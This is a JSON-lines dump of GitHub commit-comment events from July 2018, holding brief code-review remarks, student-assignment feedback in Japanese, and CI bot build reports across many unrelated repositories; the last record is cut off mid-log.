{"id":"7980445494","type":"CommitCommentEvent","actor":{"login":"tennercoffee"},"repo":{"name":"tennercoffee/OT-Phisto-GUI"},"payload":{"comment":{"id":29743579,"position":null,"line":null,"path":null,"commit_id":"04a82e63d95d7ec38196e408d5dfd1cde71ecd1e","created_at":"2018-07-18T03:35:43Z","updated_at":"2018-07-18T03:35:43Z","author_association":"OWNER","body":"test commit"}},"created_at":"2018-07-18T03:35:43Z"}
{"id":"7980445526","type":"CommitCommentEvent","actor":{"login":"armink"},"repo":{"name":"chenyong111/rt-thread"},"payload":{"comment":{"id":29743580,"position":78,"line":83,"path":"components/net/sal_socket/include/socket/sys_socket/sys/socket.h","commit_id":"475aa30148d44aa4d54a842a757c3c782f4a0b8e","created_at":"2018-07-18T03:35:44Z","updated_at":"2018-07-18T03:35:44Z","author_association":"NONE","body":"没有同步过来"}},"created_at":"2018-07-18T03:35:44Z"}
{"id":"7980445707","type":"CommitCommentEvent","actor":{"login":"SuperPowerCoding"},"repo":{"name":"SuperPowerCoding/GreatDevelopers"},"payload":{"comment":{"id":29743582,"position":6,"line":6,"path":"Study/HackerRank/Alice and Bob's Silly Game/Java 7/jjhbaram.java","commit_id":"85d526271048f6a4d66b559482ae023a62c1f036","created_at":"2018-07-18T03:35:48Z","updated_at":"2018-07-18T03:35:48Z","author_association":"OWNER","body":"ㅠㅠ"}},"created_at":"2018-07-18T03:35:48Z"}
{"id":"7980446502","type":"CommitCommentEvent","actor":{"login":"armink"},"repo":{"name":"chenyong111/rt-thread"},"payload":{"comment":{"id":29743584,"position":4,"line":200,"path":"components/net/lwip-2.0.2/src/api/sockets.c","commit_id":"475aa30148d44aa4d54a842a757c3c782f4a0b8e","created_at":"2018-07-18T03:36:08Z","updated_at":"2018-07-18T03:36:08Z","author_association":"NONE","body":"还原"}},"created_at":"2018-07-18T03:36:08Z"}
{"id":"7980447670","type":"CommitCommentEvent","actor":{"login":"armink"},"repo":{"name":"chenyong111/rt-thread"},"payload":{"comment":{"id":29743586,"position":4,"line":12,"path":"components/net/lwip-1.4.1/src/lwipopts.h","commit_id":"475aa30148d44aa4d54a842a757c3c782f4a0b8e","created_at":"2018-07-18T03:36:35Z","updated_at":"2018-07-18T03:36:35Z","author_association":"NONE","body":"还原"}},"created_at":"2018-07-18T03:36:35Z"}
{"id":"7980448195","type":"CommitCommentEvent","actor":{"login":"SheffieldLee"},"repo":{"name":"ssrpanel/SSRPanel"},"payload":{"comment":{"id":29743588,"position":null,"line":null,"path":null,"commit_id":"d5987183b57b1077475a6c566d175387406bbfac","created_at":"2018-07-18T03:36:47Z","updated_at":"2018-07-18T03:36:47Z","author_association":"NONE","body":"老大，标签去重没效果啊。还是存在重复标签的情况"}},"created_at":"2018-07-18T03:36:47Z"}
{"id":"7980449683","type":"CommitCommentEvent","actor":{"login":"yushijinhun"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29743591,"position":9,"line":8,"path":"src/viewer.ts","commit_id":"a48f935f06f70717355b0b0f62d2cb684afe1ddd","created_at":"2018-07-18T03:37:21Z","updated_at":"2018-07-18T03:37:21Z","author_association":"MEMBER","body":"This should be readonly."}},"created_at":"2018-07-18T03:37:21Z"}
{"id":"7980449826","type":"CommitCommentEvent","actor":{"login":"BruJu"},"repo":{"name":"BruJu/RMEventMonsterReader"},"payload":{"comment":{"id":29743592,"position":5,"line":35,"path":"src/fr/bruju/rmeventreader/actionmakers/actionner/Operator.java","commit_id":"0ba4208b0d3b3e8b33495889116941d139656305","created_at":"2018-07-18T03:37:25Z","updated_at":"2018-07-18T03:37:25Z","author_association":"OWNER","body":"La division a pour élément absorbant (à gauche) 0."}},"created_at":"2018-07-18T03:37:25Z"}
{"id":"7980450764","type":"CommitCommentEvent","actor":{"login":"yushijinhun"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29743595,"position":43,"line":67,"path":"src/viewer.ts","commit_id":"a48f935f06f70717355b0b0f62d2cb684afe1ddd","created_at":"2018-07-18T03:37:47Z","updated_at":"2018-07-18T03:37:47Z","author_association":"MEMBER","body":"Why `angleRot: true` is removed?"}},"created_at":"2018-07-18T03:37:47Z"}
{"id":"7980451868","type":"CommitCommentEvent","actor":{"login":"WilliamHoang"},"repo":{"name":"ANNIEHZY/PLANNER"},"payload":{"comment":{"id":29743600,"position":null,"line":null,"path":null,"commit_id":"f7bd0fc7df5aed8e3c88e7f8c978703fafb6d55d","created_at":"2018-07-18T03:38:15Z","updated_at":"2018-07-18T03:38:15Z","author_association":"NONE","body":"@ANNIEHZY :  Your first github repo!! Congrats "}},"created_at":"2018-07-18T03:38:15Z"}
{"id":"7980456924","type":"CommitCommentEvent","actor":{"login":"mubaidr"},"repo":{"name":"BrainJS/brain.js"},"payload":{"comment":{"id":29743606,"position":5,"line":63,"path":"src/utilities/data-formatter.js","commit_id":"7bdf4e7b8fbc9f519bcc83a9f12d051182407ba4","created_at":"2018-07-18T03:40:18Z","updated_at":"2018-07-18T03:40:18Z","author_association":"CONTRIBUTOR","body":"Is not this check redundant? As we are always adding un-recognized character support at: https://github.com/BrainJS/brain.js/commit/7bdf4e7b8fbc9f519bcc83a9f12d051182407ba4#diff-85d9ec841e50b2fc3a6ac5193df8fb07R125\r\n\r\nOr I am missing something? \r\n\r\nShould work just fine, I guess: \r\n```js\r\nif (index === undefined) {\r\n  index = indexTable['unrecognized'];\r\n}else if(index < maxThreshold){\r\n continue;\r\n}\r\nresult.push(index);\r\n```"}},"created_at":"2018-07-18T03:40:18Z"}
{"id":"7980458613","type":"CommitCommentEvent","actor":{"login":"Hacksore"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29743608,"position":43,"line":67,"path":"src/viewer.ts","commit_id":"a48f935f06f70717355b0b0f62d2cb684afe1ddd","created_at":"2018-07-18T03:41:00Z","updated_at":"2018-07-18T03:41:00Z","author_association":"COLLABORATOR","body":"![image](https://user-images.githubusercontent.com/996134/42858088-780decc0-8a12-11e8-9c4a-432e94656c0d.png)\r\n"}},"created_at":"2018-07-18T03:41:00Z"}
{"id":"7980459687","type":"CommitCommentEvent","actor":{"login":"Hacksore"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29743610,"position":43,"line":67,"path":"src/viewer.ts","commit_id":"a48f935f06f70717355b0b0f62d2cb684afe1ddd","created_at":"2018-07-18T03:41:24Z","updated_at":"2018-07-18T03:41:24Z","author_association":"COLLABORATOR","body":"Seems to be missing from the types def?"}},"created_at":"2018-07-18T03:41:24Z"}
{"id":"7980459941","type":"CommitCommentEvent","actor":{"login":"mubaidr"},"repo":{"name":"BrainJS/brain.js"},"payload":{"comment":{"id":29743612,"position":30,"line":104,"path":"src/utilities/data-formatter.js","commit_id":"7bdf4e7b8fbc9f519bcc83a9f12d051182407ba4","created_at":"2018-07-18T03:41:29Z","updated_at":"2018-07-18T03:41:29Z","author_association":"CONTRIBUTOR","body":"`index` should be `character`\r\n\r\n```js\r\nif (indexTable['unrecognized']) {\r\n  character = characterTable[indexTable['unrecognized']];\r\n```"}},"created_at":"2018-07-18T03:41:29Z"}
{"id":"7980461320","type":"CommitCommentEvent","actor":{"login":"roman412"},"repo":{"name":"vknet/vk"},"payload":{"comment":{"id":29743613,"position":null,"line":null,"path":null,"commit_id":"2d1bf59500865c7363ec0526fc7565cbe7a7a8f0","created_at":"2018-07-18T03:42:03Z","updated_at":"2018-07-18T03:42:03Z","author_association":"NONE","body":"Compa**ti**bility"}},"created_at":"2018-07-18T03:42:03Z"}
{"id":"7980471404","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"MoonchildProductions/pale-moon-localization"},"payload":{"comment":{"id":29743629,"position":4,"line":137,"path":"en-US-CrowdIn-source/chrome/AB-CD/locale/AB-CD/mozapps/downloads/downloads.properties","commit_id":"6bdea7704faba8a5b7e02c5434a3cb10e7d34e92","created_at":"2018-07-18T03:46:02Z","updated_at":"2018-07-18T03:46:02Z","author_association":"CONTRIBUTOR","body":"@JustOff , @wolfbeast \r\nIs this right?\r\nhttp://xref.palemoon.org/uxp-trunk/search?string=fileExecutableSecurityWarningDontAsk\r\n"}},"created_at":"2018-07-18T03:46:02Z"}
{"id":"7980473714","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18016/programming-term2"},"payload":{"comment":{"id":29743634,"position":null,"line":null,"path":null,"commit_id":"f2222ef758b190fa3277e6189d8fa36d41be9c5d","created_at":"2018-07-18T03:46:55Z","updated_at":"2018-07-18T03:46:55Z","author_association":"NONE","body":"OKです。formatの順序が文章の先頭から順番ではないですが、動作上問題ないので、いいと思います。\r\n\r\nスペルの部分だけ。\r\nカラー→color\r\nです。"}},"created_at":"2018-07-18T03:46:55Z"}
{"id":"7980474720","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29743636,"position":46,"line":263,"path":"compile.rkt","commit_id":"dbee669a56d3d8298947450b9617517ee02f95d2","created_at":"2018-07-18T03:47:18Z","updated_at":"2018-07-18T03:47:18Z","author_association":"OWNER","body":"There could be many layers of MetaFuns"}},"created_at":"2018-07-18T03:47:18Z"}
{"id":"7980476250","type":"CommitCommentEvent","actor":{"login":"manjetang"},"repo":{"name":"Brucimus/GroupProject1"},"payload":{"comment":{"id":29743639,"position":null,"line":null,"path":null,"commit_id":"de8d8cd4bb039e8e0a4e55cac9df981d0ab60317","created_at":"2018-07-18T03:47:52Z","updated_at":"2018-07-18T03:47:52Z","author_association":"COLLABORATOR","body":"First commit"}},"created_at":"2018-07-18T03:47:52Z"}
{"id":"7980477105","type":"CommitCommentEvent","actor":{"login":"samhero100"},"repo":{"name":"samhero100/samhtmld"},"payload":{"comment":{"id":29743641,"position":null,"line":null,"path":null,"commit_id":"64bb45f50c78326c5f0bedd30d8c4f43d09f8e55","created_at":"2018-07-18T03:48:09Z","updated_at":"2018-07-18T03:48:09Z","author_association":"OWNER","body":"sor"}},"created_at":"2018-07-18T03:48:09Z"}
{"id":"7980481171","type":"CommitCommentEvent","actor":{"login":"yushijinhun"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29743647,"position":43,"line":67,"path":"src/viewer.ts","commit_id":"a48f935f06f70717355b0b0f62d2cb684afe1ddd","created_at":"2018-07-18T03:49:43Z","updated_at":"2018-07-18T03:49:43Z","author_association":"MEMBER","body":"It comes from here: https://github.com/bs-community/skinview3d/commit/3f1ed3679b18fdec1d4f09f7889ca32cd950eb6f?diff=unified#diff-3357b827ac22e1ca7ad0679adc88cb99R993"}},"created_at":"2018-07-18T03:49:43Z"}
{"id":"7980484256","type":"CommitCommentEvent","actor":{"login":"petercpg"},"repo":{"name":"joelshepherd/tabliss"},"payload":{"comment":{"id":29743654,"position":5,"line":62,"path":"src/app/settings/System.tsx","commit_id":"3e8ee7451d56bbf526db605e686fd8f58a41e24b","created_at":"2018-07-18T03:50:56Z","updated_at":"2018-07-18T03:50:56Z","author_association":"CONTRIBUTOR","body":"Indeed, it would be definitely be better for HK locale and users. \r\n\r\nIf you want to make it super clear the full form can be:  (value / title / element content)\r\n- zh-TW / Traditional Chinese (Taiwan) / 正體中文（台灣）\r\n- zh-HK / Traditional Chinese (Hong Kong) / 繁體中文（香港）\r\n- zh-CN / Simplified Chinese (China) / 简体中文（中国）"}},"created_at":"2018-07-18T03:50:56Z"}
{"id":"7980486784","type":"CommitCommentEvent","actor":{"login":"hexus"},"repo":{"name":"photonstorm/phaser"},"payload":{"comment":{"id":29743659,"position":null,"line":null,"path":null,"commit_id":"0cc52f6002f5a35356f4bcb877725b86b7085cd0","created_at":"2018-07-18T03:51:53Z","updated_at":"2018-07-18T03:51:53Z","author_association":"COLLABORATOR","body":"Clean :ok_hand: "}},"created_at":"2018-07-18T03:51:53Z"}
{"id":"7980487980","type":"CommitCommentEvent","actor":{"login":"yushijinhun"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29743661,"position":43,"line":67,"path":"src/viewer.ts","commit_id":"a48f935f06f70717355b0b0f62d2cb684afe1ddd","created_at":"2018-07-18T03:52:23Z","updated_at":"2018-07-18T03:52:23Z","author_association":"MEMBER","body":"It doesn't come from Kent Rasmussen's code:\r\nhttps://github.com/earthiverse/3D-Minecraft-Skin-Viewer/blob/9c2ddad1e461d084d1febce282b14c7684d6aa62/index.html#L889"}},"created_at":"2018-07-18T03:52:23Z"}
{"id":"7980488137","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29743662,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T03:52:28Z","updated_at":"2018-07-18T03:52:28Z","author_association":"NONE","body":"159125973_Issue#6843 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2982 of 2982 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-18T03:52:28Z"}
{"id":"7980489281","type":"CommitCommentEvent","actor":{"login":"FndNur1Labs"},"repo":{"name":"seredat/karbowanec"},"payload":{"comment":{"id":29743666,"position":null,"line":null,"path":null,"commit_id":"47579f988c20f5b93a7caf2c5bde24e569d45562","created_at":"2018-07-18T03:52:58Z","updated_at":"2018-07-18T03:52:58Z","author_association":"NONE","body":"@helder-garcia @aivve  someone said about port vulnerability\r\n\r\non : https://github.com/seredat/karbowanec/blob/master/src/P2p/NetNode.cpp\r\n\r\n`addPortMapping(logger, m_listeningPort);`\r\n\r\nhow to fixed it. they said can attack from outside."}},"created_at":"2018-07-18T03:52:58Z"}
{"id":"7980491721","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29743675,"position":31,"line":139,"path":"data/fleet.txt","commit_id":"6d11764ba9517f12658b0cae199d47dff701acc9","created_at":"2018-07-18T03:53:59Z","updated_at":"2018-07-18T03:53:59Z","author_association":"NONE","body":"that's my boy <3"}},"created_at":"2018-07-18T03:53:59Z"}
{"id":"7980495136","type":"CommitCommentEvent","actor":{"login":"FndNur1Labs"},"repo":{"name":"cryptonotefoundation/cryptonote"},"payload":{"comment":{"id":29743678,"position":null,"line":null,"path":null,"commit_id":"9d86753516617c1f25e2b2d312089d238b71c411","created_at":"2018-07-18T03:55:21Z","updated_at":"2018-07-18T03:55:21Z","author_association":"NONE","body":"i already check yes you double input on cumul and i used after \r\n\r\n`block_short.hash = Common::podToHex(blockHash);`\r\n\r\nremove that one already but forgot commit here :v "}},"created_at":"2018-07-18T03:55:21Z"}
{"id":"7980495568","type":"CommitCommentEvent","actor":{"login":"atifmustaffa"},"repo":{"name":"atifmustaffa/list-contact"},"payload":{"comment":{"id":29743679,"position":null,"line":null,"path":null,"commit_id":"f5b1b82f9c847816e6dddbf3bccabd8f96540736","created_at":"2018-07-18T03:55:30Z","updated_at":"2018-07-18T03:55:30Z","author_association":"OWNER","body":"`<html><div style=\"font-weight: bold\">Test</div></html>`"}},"created_at":"2018-07-18T03:55:30Z"}
{"id":"7980495850","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29743680,"position":null,"line":null,"path":null,"commit_id":"b6a60dd6601a6947e00a0a77decd283248ba8a7f","created_at":"2018-07-18T03:55:37Z","updated_at":"2018-07-18T03:55:37Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-18T03:55:37Z"}
{"id":"7980499685","type":"CommitCommentEvent","actor":{"login":"dmex"},"repo":{"name":"processhacker/processhacker"},"payload":{"comment":{"id":29743686,"position":null,"line":null,"path":null,"commit_id":"cc06c312962c9213d20dd23b3ac8bff390ed2bdb","created_at":"2018-07-18T03:57:06Z","updated_at":"2018-07-18T03:57:06Z","author_association":"MEMBER","body":"@gvanem \r\n\r\nThis stuff is new and most types don't have kernel ifdefs or version defs for windows 7 and 8 yet 👍 "}},"created_at":"2018-07-18T03:57:06Z"}
{"id":"7980500028","type":"CommitCommentEvent","actor":{"login":"CooperD16"},"repo":{"name":"SBC-Projects/Students-who-git-gud"},"payload":{"comment":{"id":29743687,"position":null,"line":null,"path":null,"commit_id":"9544337daaad0d62a12cad05544fa89cd657f20e","created_at":"2018-07-18T03:57:14Z","updated_at":"2018-07-18T03:57:14Z","author_association":"COLLABORATOR","body":"Hmm yes, thank you."}},"created_at":"2018-07-18T03:57:14Z"}
{"id":"7980500603","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29743688,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T03:57:28Z","updated_at":"2018-07-18T03:57:28Z","author_association":"NONE","body":"159125973_Issue#6843 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-18T03:57:28Z"}
{"id":"7980501235","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/x264-feedstock"},"payload":{"comment":{"id":29743707,"position":null,"line":null,"path":null,"commit_id":"3def8f0974e1b16a4237fcb87dc19f46980b5fd0","created_at":"2018-07-18T03:57:44Z","updated_at":"2018-07-18T03:57:44Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @sdvillal were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-18T03:57:44Z"}
{"id":"7980504941","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18018/programming-term2"},"payload":{"comment":{"id":29743708,"position":null,"line":null,"path":null,"commit_id":"b696ce1f2e2bffb83ae68152f95a9449af976e78","created_at":"2018-07-18T03:59:01Z","updated_at":"2018-07-18T03:59:01Z","author_association":"NONE","body":"課題OKです。\r\n動作に問題はないですが、あえて指摘しておくと、適宜空行を入れるとコードが見やすくなりますよ。\r\n今回でいうと\r\n\r\n* import文とリストの宣言の間\r\n* リストの宣言と数字のランダム抽出の間\r\n* 数字のランダム抽出とメイン処理の間\r\n\r\nあたりに改行を入れると読みやすくなると思います。\r\n小説で段落と段落の間に1行空いてることでひと呼吸置いて読めますよね。そんな感じで「文章の美しさ」に置き換えるといいと思います。"}},"created_at":"2018-07-18T03:59:01Z"}
{"id":"7980506353","type":"CommitCommentEvent","actor":{"login":"davinkevin"},"repo":{"name":"davinkevin/hoverboard"},"payload":{"comment":{"id":29743710,"position":16,"line":106,"path":"src/elements/dialogs/session-details.html","commit_id":"c63bfb3893c936149bfc03ebbe48a15b23278e47","created_at":"2018-07-18T03:59:27Z","updated_at":"2018-07-18T03:59:27Z","author_association":"OWNER","body":"I didn't know polymer has this behavior. 👍"}},"created_at":"2018-07-18T03:59:27Z"}
{"id":"7980507524","type":"CommitCommentEvent","actor":{"login":"Balandat"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29743712,"position":10,"line":10,"path":"gpytorch/gpytorchopt/bayesian_optimization_example1_fully_dependent.py","commit_id":"3d4d937590fdb4b2a4a18cac7249af30b78ed949","created_at":"2018-07-18T03:59:55Z","updated_at":"2018-07-18T03:59:55Z","author_association":"COLLABORATOR","body":"I raised https://github.com/pytorch/pytorch/issues/9332,  hopefully this means we will have our Sobol generator available natively in pytorch (this will be quite useful to qMC etc)."}},"created_at":"2018-07-18T03:59:55Z"}
{"id":"7980509424","type":"CommitCommentEvent","actor":{"login":"JosephineRabbit"},"repo":{"name":"JosephineRabbit/babystep"},"payload":{"comment":{"id":29743725,"position":null,"line":null,"path":null,"commit_id":"71b9506b31db8d99f0227d9e7e91e85678237c32","created_at":"2018-07-18T04:00:37Z","updated_at":"2018-07-18T04:00:37Z","author_association":"OWNER","body":"the model on experiment now"}},"created_at":"2018-07-18T04:00:37Z"}
{"id":"7980509960","type":"CommitCommentEvent","actor":{"login":"Jonathan-Rosewood"},"repo":{"name":"TorchAPI/Essentials"},"payload":{"comment":{"id":29743729,"position":15,"line":91,"path":"Essentials/EssentialsPlugin.cs","commit_id":"ece8376cf70062a0c2039821d983be38d78a4e38","created_at":"2018-07-18T04:00:50Z","updated_at":"2018-07-18T04:00:50Z","author_association":"NONE","body":"```mpMan.PlayerJoined -= MotdOnce;```\r\nctrl+c ctrl+v :)"}},"created_at":"2018-07-18T04:00:50Z"}
{"id":"7980512845","type":"CommitCommentEvent","actor":{"login":"davinkevin"},"repo":{"name":"davinkevin/hoverboard"},"payload":{"comment":{"id":29743732,"position":41,"line":223,"path":"src/elements/dialogs/session-details.html","commit_id":"c63bfb3893c936149bfc03ebbe48a15b23278e47","created_at":"2018-07-18T04:02:00Z","updated_at":"2018-07-18T04:02:00Z","author_association":"OWNER","body":"I can merge both check `(speakers.length > 0)` and `(typeof session.speakers[0] === 'object')`."}},"created_at":"2018-07-18T04:02:00Z"}
{"id":"7980518079","type":"CommitCommentEvent","actor":{"login":"carlosmaniero"},"repo":{"name":"carlosmaniero/pokemon-adoption"},"payload":{"comment":{"id":29743746,"position":3,"line":3,"path":"src/species/SpecieList.js","commit_id":"aaed312aca95d9498ab719d7c12f3dcafbf372a9","created_at":"2018-07-18T04:04:11Z","updated_at":"2018-07-18T04:04:11Z","author_association":"OWNER","body":"I'll definitely add a linter to the pipeline"}},"created_at":"2018-07-18T04:04:11Z"}
{"id":"7980518126","type":"CommitCommentEvent","actor":{"login":"dmex"},"repo":{"name":"processhacker/processhacker"},"payload":{"comment":{"id":29743747,"position":7,"line":53,"path":"phnt/include/ntnls.h","commit_id":"a349a42c751fa9c3304b50a3cfc5f16e1c7f4148","created_at":"2018-07-18T04:04:12Z","updated_at":"2018-07-18T04:04:12Z","author_association":"MEMBER","body":"https://github.com/processhacker/processhacker/commit/bbc3abbfce1566c3b429b07668eff9914e8b903d"}},"created_at":"2018-07-18T04:04:12Z"}
{"id":"7980520313","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18021/programming-term2"},"payload":{"comment":{"id":29743751,"position":null,"line":null,"path":null,"commit_id":"0240269515e796306f6fb3fd534fcc52b8d51511","created_at":"2018-07-18T04:05:09Z","updated_at":"2018-07-18T04:05:09Z","author_association":"NONE","body":"課題OKです。1人目と2人目と3人目の抽出をそれぞれ区切って書いてるの、これはこれで見やすくて良いと思います。\r\n(3人目が唐突なチョイスでおもしろいです。笑)"}},"created_at":"2018-07-18T04:05:09Z"}
{"id":"7980521529","type":"CommitCommentEvent","actor":{"login":"MichaelB7"},"repo":{"name":"MJZ1977/Stockfish"},"payload":{"comment":{"id":29743754,"position":null,"line":null,"path":null,"commit_id":"1aea700b1fff0f0200d63e40eab0ae3933dfa643","created_at":"2018-07-18T04:05:40Z","updated_at":"2018-07-18T04:05:40Z","author_association":"NONE","body":"I'm having some success on my local with these two changes:\r\n\r\n`    ||  (Limits.use_time_management() && Time.elapsed() >= Time.optimum() * 2/4))`\r\n\r\nand \r\n\r\n`\tDepth newDepth  = std::min(2 * ONE_PLY + rootDepth / 8, (MAX_PLY - ss->ply) * ONE_PLY);`"}},"created_at":"2018-07-18T04:05:40Z"}
{"id":"7980525523","type":"CommitCommentEvent","actor":{"login":"Balandat"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29743764,"position":18,"line":18,"path":"gpytorch/gpytorchopt/gpytorchopt/bayesian_optimization.py","commit_id":"3d4d937590fdb4b2a4a18cac7249af30b78ed949","created_at":"2018-07-18T04:07:18Z","updated_at":"2018-07-18T04:07:18Z","author_association":"COLLABORATOR","body":"So we've thought about how to handle this kind of scaling and feature / outcome transforms (e.g. standardization, one-hot encoding, etc.) more generally. We think it would make sense if this lived outside the inner low-level optimization loop, e.g. as helper functions. What's your take on this?"}},"created_at":"2018-07-18T04:07:18Z"}
{"id":"7980526691","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29743765,"position":null,"line":null,"path":null,"commit_id":"5cea385cf50c2c1ff40aea01362b600191a200e4","created_at":"2018-07-18T04:07:49Z","updated_at":"2018-07-18T04:07:49Z","author_association":"NONE","body":"結果OKです。死ねって。。。笑\r\nコードの部分ですが、ただ動くだけでなく、改行を適宜入れると、第三者にとっても読みやすくなると思います。\r\n\r\nimportとリストの定義、リストの定義と乱数の取得、乱数の取得と結果表示の間あたりにそれぞれ空行を入れると良いかと。\r\n小説で段落ごとに空行があるとひと呼吸置けて読みやすいような、そんなイメージです。"}},"created_at":"2018-07-18T04:07:49Z"}
{"id":"7980527390","type":"CommitCommentEvent","actor":{"login":"zengbs"},"repo":{"name":"zengbs/hello-world"},"payload":{"comment":{"id":29743767,"position":null,"line":null,"path":null,"commit_id":"dc1b526ebac43ec1c149abdfa9d63d8a9d077ee0","created_at":"2018-07-18T04:08:07Z","updated_at":"2018-07-18T04:08:07Z","author_association":"OWNER","body":"here is the 1st comment for 1st edit."}},"created_at":"2018-07-18T04:08:07Z"}
{"id":"7980531269","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29743775,"position":null,"line":null,"path":null,"commit_id":"d82dc95c856cbaa5b507ff94cd0b839c4b8c408f","created_at":"2018-07-18T04:09:48Z","updated_at":"2018-07-18T04:09:48Z","author_association":"NONE","body":"あっ。。。ソースはsrcディレクトリで大丈夫でした。\r\nちなみに、\r\nsrc：ソース(source)の略\r\ndocs：文書(documents)の略\r\nです。それぞれ分けて配置したく、そういうディレクトリ構成にしました。"}},"created_at":"2018-07-18T04:09:48Z"}
{"id":"7980532177","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29743776,"position":null,"line":null,"path":null,"commit_id":"43c21dfb02c25ebd994e863645d599878793e3db","created_at":"2018-07-18T04:10:11Z","updated_at":"2018-07-18T04:10:11Z","author_association":"NONE","body":"bill plz help\r\nidroid im talking to you plz help im stuck in this box of text"}},"created_at":"2018-07-18T04:10:11Z"}
{"id":"7980533534","type":"CommitCommentEvent","actor":{"login":"thomasnguyen"},"repo":{"name":"april-april/CTCI"},"payload":{"comment":{"id":29743777,"position":null,"line":null,"path":null,"commit_id":"9dc70db0924e27791feb3fb4e4e5fb98a997df90","created_at":"2018-07-18T04:10:41Z","updated_at":"2018-07-18T04:10:41Z","author_association":"NONE","body":"Oh nice, actually your method is really concise! 👌\r\n"}},"created_at":"2018-07-18T04:10:41Z"}
{"id":"7980535653","type":"CommitCommentEvent","actor":{"login":"suntong"},"repo":{"name":"Chatie/wechaty-getting-started"},"payload":{"comment":{"id":29743779,"position":31,"line":35,"path":"examples/starter-bot.js","commit_id":"feae020e4dd5d62baf4ea69fb99ba81efa36ef87","created_at":"2018-07-18T04:11:35Z","updated_at":"2018-07-18T04:11:35Z","author_association":"CONTRIBUTOR","body":"Emm... I think so. \r\n\r\nBecause I think it is not shielding the beginners from the \"advanced\" staff that is important, but laying out a good foundation for them to move toward the correct direction that matters most. \r\n\r\nIn this regard, I think adding `async` back might be a better move. I.e., I like your original approach better -- `async` for onMessage, and normal for all rest (on scan, log in/out). "}},"created_at":"2018-07-18T04:11:35Z"}
{"id":"7980536257","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/refarm-site"},"payload":{"comment":{"id":29743782,"position":null,"line":null,"path":null,"commit_id":"39ae766dd293f1db34b014aca02270f879067791","created_at":"2018-07-18T04:11:51Z","updated_at":"2018-07-18T04:11:51Z","author_association":"COLLABORATOR","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> set -x && set -e && set -o pipefail && cd /tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site && pdd -v -f /tmp/20180718-22796-xiuaxl [1]: bash: warning: setlocale: LC_ALL: cannot change locale (UTF-8) + set -e + set -o pipefail + cd /tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site + pdd -v -f...\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nUserError\nset -x && set -e && set -o pipefail && cd /tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site && pdd -v -f /tmp/20180718-22796-xiuaxl 